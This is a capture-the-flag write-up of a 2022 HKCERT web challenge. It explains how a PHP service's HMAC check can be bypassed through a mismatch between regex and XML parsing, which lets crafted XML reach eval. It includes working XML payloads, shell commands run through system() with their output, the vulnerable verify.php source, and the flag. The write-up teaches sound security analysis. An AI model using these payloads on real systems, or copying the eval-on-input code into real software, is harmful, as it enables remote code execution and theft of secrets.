# HKCERT-CTF 2022 Expat Passer Confucian 黃大仙祠孔道門
(17)
Expat Passer Confucian 黃大仙祠孔道門
369 Points / 1 Solve / Web / ★★★★☆
# Author
ozetta
# Solver
O0056 - T0003 (2022) @ TWY's Temple
# Description
Read out the challenge name if you have no idea what's going on with this challenge (Only applicable to the English version).
Web: `http://chal.hkcert22.pwnable.hk:28117`
# Files
expat-passer-confucian_4c1743e5acf50f6fc22c42277f28d939.zip:
- [sign.php](#signphp)
- [verify.php](#verifyphp)
# Analysis
We can see the first lines after `<?php` in both files are `include_once("secret.php");`, which `include` is like the import statement in other programming languages, except the variable scope is inherited. (`_once` means not to reload when the same file has been included before)
Also, it only emits a warning instead of an error (unlike `require` / `require_once`) when the file to include is not found.
This means the variables defined in `secret.php` are also accessible in `sign.php` and `verify.php`.
One of them we can see from the source code is `$secret` from `hash_hmac('sha256',$envelope,$secret);` in both files.
Opening the webpage provided in a browser. The interface looks like the following:
<div style="border: 1px solid black; padding: 8px">
<span style="font-size:2em; font-weight: bold;">Johnny's Perfect Math Class</span><hr>
<div style="font-size:1.5em; font-weight: bold; margin: 20px 0;">Sign a message</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Author</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">祖沖之</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Formula</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">355/113</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Comment</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">密率,圓徑一百一十三,圓周三百五十五。</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Message</span>
<span style="display: inline-block; width: 188px; height: 118px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; resize: both; overflow: auto; vertical-align: top"></span>
</div>
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Submit</span>
<hr>
<div style="font-size:1.5em; font-weight: bold; margin: 20px 0">Verify a message</div>
<div style="margin: 16px 0">
Message
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Choose File</span>
<span style="display: inline-block; border: 2px; padding: 1px 6px; font-size: 13px">No file chosen</span>
</div>
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Submit</span>
</div>
<br>
:::info
**Johnny's Perfect Math Class** seems to be a name parody of **Cirno's Perfect Math Class (チルノのパーフェクトさんすう教室)** ||⑨||.<sup>[[Nico Nico Pedia Article / Japanese Site]](https://dic.nicovideo.jp/a/チルノのパーフェクトさんすう教室)</sup> This name also describes the intended use of the Formula field in the form as storing a mathematical expression for calculation.
**Johnny** (/ˈd͡ʒɑni/ (US), /ˈd͡ʒɒni/ (UK)) is an English name which is usually translated to the same as Confucius' courtesy name: **仲尼** (Cantonese: zung6 nei4 (/tsʊŋ˨nei̯˩/) / Mandarin: Zhòngní (<span style="font-family: Microsoft JhengHei, sans-serif;">ㄓㄨㄥˋㄋㄧˊ</span>) /ʈʂʊŋ˥˩ni˧˥/), so some people call Confucius as Johnny in hilarious context.
**密率** (lit. *Close Ratio*) is a close fractional approximation to π (355/113, *approx.* <u>3.141592</u>920) found by **祖沖之** (Zu Chongzhi) in the 5<sup>th</sup> century without the explicit use of continued fraction (Some often suggested the method used to be "Liu Hui's π algorithm" (割圓術) or "harmonization of the divisor of the day (denominator)" (調日法), though no exact evidence from Zu has been known).<sup>[[Wikipedia Article](https://en.wikipedia.org/wiki/Mil%C3%BC)]</sup> **「密率,圓徑一百一十三,圓周三百五十五。」** is the original text recorded in *Book of Sui, Rhythm and the Calendar (I)* (《隋書·律曆志上》).
The Chinese version of the challenge title, **黃大仙祠孔道門** (lit. *Confucian Veranda, Wong Tai Sin Temple*) is built in front of the Confucian Hall (麟閣), where Confucius and his 72 disciples are worshipped, in Wong Tai Sin Temple<sup>[[Source]](http://www.wongtaisintemple.org.hk/en/all-buildings/content/confucian-veranda)</sup>.
:::
We can use these suggested values in the textbox to see how the service behaves.
When we input something into the textboxes, the message field is automatically updated. That is also the only field with a `name` attribute inside the form, which means this is the only value submitted to the server *(so we can edit it directly (by removing the readonly attribute), though actually not needed)*
The generated message field looks like the following:
```xml!
<message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message>
```
Let's submit and see what `sign.php` does:
```
<root><envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope><hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac></root>
```
(Formatted)
```xml!
<root>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
By observation, we can see that the message is wrapped by the `<envelope>` tag, followed by the `<hmac>` tag containing the server signature of the envelope, and all are wrapped by a single `<root>` tag.
Let's check the source in sign.php:
```php!
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
```
The first line calls extra functions when the parser reaches the opening tags (`$start_handler: tag_open`) and the closing tags (`$end_handler: tag_close`).
The second line does so when parsing the content inside the tag (`$handler: cdata`).
The initialized values of `cur` is "X", and that of `bad` is false. We can assume `cur` as the temporary variable to determine which tag the parser is handling, and `bad` to determine whether the payload is malformed.
```php!
function tag_open($parser, $tag, $attributes){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == 'X'){
$this->cur = $tag;
}else{
$this->bad = true;
}
}
}
```
:::info
If it reaches any of AUTHOR, FORMULA, or COMMENT opening tag (case-sensitive), check if the `cur` is `'X'` (tag not nested or no tag left unclosed).
If so, then `cur` becomes the name of the tag.
Otherwise, `bad` is set as true.
:::
```php!
function tag_close($parser, $tag){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == $tag){
$this->cur = 'X';
}else{
$this->bad = true;
}
}
}
```
:::info
If it reaches any of AUTHOR, FORMULA, or COMMENT closing tag (case-sensitive), check if the `cur` (name of the opening tag) is the same as the name of the closing tag. (check if tag matches)
If so, `cur` is reset to `X` (no unclosed tag).
Otherwise, `bad` is set as true.
:::
```php!
function cdata($parser, $cdata){
if($this->cur == 'AUTHOR'){
$this->author = substr($cdata, 0, 64);
}elseif($this->cur == 'FORMULA'){
$this->formula = preg_replace('/[^0-9\+\-\*\/\.]/','',$cdata);
}elseif($this->cur == 'COMMENT'){
$this->comment .= $cdata;
$this->comment = substr($this->comment, 0, 1024);
}
}
```
:::info
For AUTHOR tag, only the first 64 characters are stored to the real author attribute.
For FORMULA tag, all characters other than `0123456789+-*/.` are removed.
For COMMENT tag, only the first 1024 characters are stored to the real comment attribute.
:::
Just as the observation, the reconstructed message (`output()`), hmac (`hash_hmac('sha256',$envelope,$secret)`) and wrapper tags are added to form the real XML output.
(If the value of `bad` is true or if the payload is malformed, then the envelope content will be emptied.)
Let's submit the above payload to the verify section.
Here is the output:
```
Timestamp: 1668402438.5818
Author: 祖沖之
Comment: 密率,圓徑一百一十三,圓周三百五十五。
Formula: 355/113
= 3.141592920354
```
We can see that the timestamp, author, comment, and formula is shown, plus the calculation result of the formula. This calculation (by `eval`) is most likely to be a source of vulnerability.
Notice that even characters like `()[]^` and spaces are not allowed, so the possibility of playing with strings are very limited.
:::spoiler Example payloads with brackets
```
(1/100000).(1/100000) // 1.0E-51.0E-5
(999**999).(999**999) // INFINF
((999**999).(999**999))^((1/100000).(999**999)) // x`vcs
((1/100000).(1))[3] // E
```
[[Further Reading]](https://github.com/splitline/PHPFuck)
Without brackets, there are really not too many thing you can play here.
By the way, the PHP version used by the platform is 8.1.9.
:::
Let's check how the parser works.
```php!
$xml = simplexml_load_string($upload);
```
Okay, as simple as shown.
Also see how the four attributes are extracted:
```php!
echo "Timestamp: ".$xml->envelope->timestamp."\n";
echo "Author: ".$xml->envelope->message->author."\n";
echo "Comment: ".$xml->envelope->message->comment."\n";
echo "Formula: ".$xml->envelope->message->formula."\n = ";
@eval("print(".$xml->envelope->message->formula.");");
```
Also straight forward. One thing to notice is that the envelope used is the (first) one **exactly right (1 level) under the root**.
Let's check how the verifier works.
The hmac is computed as:
```php!
$hmac_computed = hash_hmac('sha256',$envelope,$secret); // $secret in secret.php
// checking mechanism
$hmac === $hmac_computed
```
The hmac is extracted by:
```php!
// $upload is the xml content
preg_match('/\<hmac\>(.*?)\<\/hmac\>/',$upload,$matches)
$hmac = $matches[1];
```
Which is the inner content of the first \<hmac\>\</hmac\> found.
The envelope used above is computed as:
```php!
preg_match('/\<envelope\>.*?\<\/envelope\>/',$upload,$matches)
$envelope = $matches[0];
```
Which is the outer content (including the tags) of the **first** \<envelope\>\</envelope\> found.
Notice the definitions of the envelope used in hmac checking and that of the envelope used in data retrieval are different.
:::info
**Recall:**
- The envelope used in hmac checking
- The **first** envelope found in the file **(actually with more rules, to be discussed later)**
- The envelope used in data retrieval
- The **first** envelope found in the file **as the direct children of root (not all descendents)**
:::
Which means, if the first envelope in the file is not 1 layer under the root, it will be used for hmac checking but not for data retrieval. So we can use the known hmac from signing for such envelope:
(Formatted)
```xml!
<root>
<this-is-only-for-hmac-checking>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
</this-is-only-for-hmac-checking>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
Then we can craft another envelope to perform arbitrary code execution. (No checks (hmac or character filtering) are done to this envelope)
(Formatted)
```xml!
<root>
<this-is-only-for-hmac-checking>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
</this-is-only-for-hmac-checking>
<envelope>
<message>
<author>O0056 - T0003 (2022) @ TWY’s Temple</author>
<formula>$secret</formula>
<comment>Execute Arbitrary PHP Code.</comment>
</message>
<timestamp>In the Future</timestamp>
</envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
This is used to get the content of `$secret`.
Notice that no `s` (single line / dotall) flag is specified in `preg_match`, which means it does not match envelope across lines. Therefore we need to remove all new-line characters inside the envelope.
:::warning
(Reminder: the signed envelope is supposed to be kept identical regardless the regex flag, as hmac considers adding line breaks, spaces or tabs as changing the string just like other hash functions.)
:::
For example:
```xml!
<root><this-is-only-for-hmac-checking><envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope></this-is-only-for-hmac-checking><envelope><message><author>O0056 - T0003 (2022) @ TWY’s Temple</author><formula>$secret</formula><comment>Execute Arbitrary PHP Code.</comment></message><timestamp>In the Future</timestamp></envelope><hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac></root>
```
:::info
This regex pattern also means we can have another solution.
We can keep the envelope used in hmac signature in 1 line (this is also necessary), but having the malicious payload in more than 1 lines before the signed envelope. This way we do not need any fake tag wrappers.
Example:
```xml!
<root>
<envelope>
<message>
<author>O0056 - T0003 (2022) @ TWY’s Temple</author>
<formula>$secret</formula>
<comment>Execute Arbitrary PHP Code.</comment>
</message>
<timestamp>In the Future</timestamp>
</envelope>
<envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
:::
We can check the result using this payload. The result is:
```
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: $secret
= hkcert222{sorry,not this way...}
```
Clearly the value of `$secret` is `hkcert222{sorry,not this way...}`, but it is not the flag.
We can also use other payloads like `phpinfo()` (check PHP version, configs, etc.).
But most importantly, we can do arbitrary read (using `file_get_contents($filename)`) and even further than that, execute shell command using `system($command)`.
This means we can list out the files as needed.
```
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('ls -la')
= total 24
dr-xr-xr-x 1 root root 4096 Nov 4 03:24 .
dr-xr-xr-x 1 root root 4096 Aug 23 13:01 ..
-r--r--r-- 1 root root 1217 Oct 30 03:53 index.html
-r--r--r-- 1 root root 511 Oct 30 03:53 secret.php
-r--r--r-- 1 root root 2752 Oct 30 03:53 sign.php
-r--r--r-- 1 root root 1037 Oct 30 03:53 verify.php
-r--r--r-- 1 root root 1037 Oct 30 03:53 verify.php
```
(`system($command)` returns the last line of output, so it is duplicated here as it is wrapped by `print()`.)
There is no file with name like `flag`, but the file size of `secret.php` seems to indicate that it does not only contain the $secret for hmac calculation.
```php!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('cat secret.php')
= <?php $secret = "hkcert222{sorry,not this way...}";
```
Just that? Check the scroll bar more carefully...
(or just use `base64 secret.php` to prevent troll)
```php!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('cat secret.php')
= <?php $secret = "hkcert222{sorry,not this way...}";
// ...
// lots of blank lines
// ...
$flag = "hk"."cert"."22"."{"."Million_years_0f_paradigm"."-"."Billion_units_0f_lol"."}";
// ...
// lots of blank lines
// ...
?>?>
```
We can already see the flag content.
(That's also why grep `hkcert` does not work. This may also somehow troll users using `head`, `tail`, etc. to read `secret.php`)
To avoid possible copy / manual input error, we can use the `$flag` variable instead.
```!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: $flag
= hkcert22{Million_years_0f_paradigm-Billion_units_0f_lol}
```
The flag is then obtained.
:::success
> Read out the challenge name if you have no idea what’s going on with this challenge (Only applicable to the English version).
Read it again:
Expat (Expat ~~Expect~~ ~~Expert~~) Passer (Parser) Confucian (Confusion)
> expat is still expat.. Expat is an XML parser - ozetta
See what we successfully done is to confuse the parser to take different envelopes for different uses.
> 異鄉過客孔夫子 - ozetta
Word-by-word translation?
:::
# Appendix
## Frontend Source
:::spoiler Source
```html=
<html>
<head>
<title>Johnny's Perfect Math Class</title>
<meta charset="utf-8" />
</head>
<body>
<h1>Johnny's Perfect Math Class</h1>
<hr />
<h2>Sign a message</h2>
<form method="post" action="sign.php">
<table>
<tr><td>Author</td><td><input id="author" onchange="msgbox()" placeholder="祖沖之" size="50" /></td></tr>
<tr><td>Formula</td><td><input id="formula" onchange="msgbox()" placeholder="355/113" size="50" /></td></tr>
<tr><td>Comment</td><td><input id="comment" onchange="msgbox()" placeholder="密率,圓徑一百一十三,圓周三百五十五。" size="50" /></td></tr>
<tr><td>Message</td><td><textarea id="message" name="message" readonly="readonly" cols="22" rows="7" /></textarea></tr>
<tr><td colspan="2"><input type="submit"/></td></tr>
</table>
</form>
<hr />
<h2>Verify a message</h2>
<form method="post" action="verify.php" enctype="multipart/form-data">
<p>Message <input type="file" name="message" /></p>
<p><input type="submit" /></p>
</form>
<script>
function msgbox(){
message.innerText = `<message><author>${author.value}</author><formula>${formula.value}</formula><comment>${comment.value}</comment></message>`;
}
</script>
</body>
</html>
```
:::
## Provided Source File(s)
### sign.php
:::spoiler Source
```php=
<?php
include_once("secret.php");
class MessageParser{
private $parser;
private $cur;
private $bad;
private $author;
private $formula;
private $comment;
private $message;
function __construct() {
$this->cur = "X";
$this->bad = false;
$this->author = "";
$this->formula = "";
$this->comment = "";
$this->message = "<message></message>";
$this->parser = xml_parser_create();
xml_set_object($this->parser, $this);
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
}
function __destruct(){
xml_parser_free($this->parser);
unset($this->parser);
}
function parse($data){
xml_parse($this->parser, $data);
}
function tag_open($parser, $tag, $attributes){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == 'X'){
$this->cur = $tag;
}else{
$this->bad = true;
}
}
}
function cdata($parser, $cdata){
if($this->cur == 'AUTHOR'){
$this->author = substr($cdata, 0, 64);
}elseif($this->cur == 'FORMULA'){
$this->formula = preg_replace('/[^0-9\+\-\*\/\.]/','',$cdata);
}elseif($this->cur == 'COMMENT'){
$this->comment .= $cdata;
$this->comment = substr($this->comment, 0, 1024);
}
}
function tag_close($parser, $tag){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == $tag){
$this->cur = 'X';
}else{
$this->bad = true;
}
}
}
function output(){
if(xml_get_error_code($this->parser) || $this->bad == true){
return "<message></message>";
}else{
$this->message = "<message>";
if($this->author != ""){
$this->message .= "<author>".htmlentities($this->author)."</author>";
}
if($this->formula != ""){
$this->message .= "<formula>".$this->formula."</formula>";
}
if($this->comment != ""){
$this->message .= "<comment>".htmlentities($this->comment)."</comment>";
}
$this->message .= "</message>";
return $this->message;
}
}
}
if(isset($_POST["message"])){
$msgparser = new MessageParser();
$msgparser->parse($_POST["message"]);
$output = $msgparser->output();
$envelope = "<envelope>".$output."<timestamp>".microtime(1)."</timestamp></envelope>";
$hmac = hash_hmac('sha256',$envelope,$secret);
$final = "<root>".$envelope."<hmac>".$hmac."</hmac></root>";
header('Content-Disposition: attachment; filename="'.$hmac.'.xml"');
echo $final;
}else{
header("Location: index.html");
exit();
}
?>
```
:::
### verify.php
:::spoiler Source
```php=
<?php
include_once("secret.php");
header("Content-type: text/plain");
if(isset($_FILES['message']) && is_uploaded_file($_FILES['message']['tmp_name'])){
$upload = file_get_contents($_FILES['message']['tmp_name']);
if(preg_match('/\<envelope\>.*?\<\/envelope\>/',$upload,$matches)){
$envelope = $matches[0];
if(preg_match('/\<hmac\>(.*?)\<\/hmac\>/',$upload,$matches)){
$hmac = $matches[1];
$hmac_computed = hash_hmac('sha256',$envelope,$secret);
if($hmac === $hmac_computed){
$xml = simplexml_load_string($upload);
echo "Timestamp: ".$xml->envelope->timestamp."\n";
echo "Author: ".$xml->envelope->message->author."\n";
echo "Comment: ".$xml->envelope->message->comment."\n";
echo "Formula: ".$xml->envelope->message->formula."\n = ";
@eval("print(".$xml->envelope->message->formula.");");
}else{
die("Error: invalid hmac");
}
}else{
die("Error: no hmac found");
}
}else{
die("Error: no envelope found");
}
}
?>
```
:::
# Flag
:::spoiler Flag
``hkcert22{Million_years_0f_paradigm-Billion_units_0f_lol}``
:::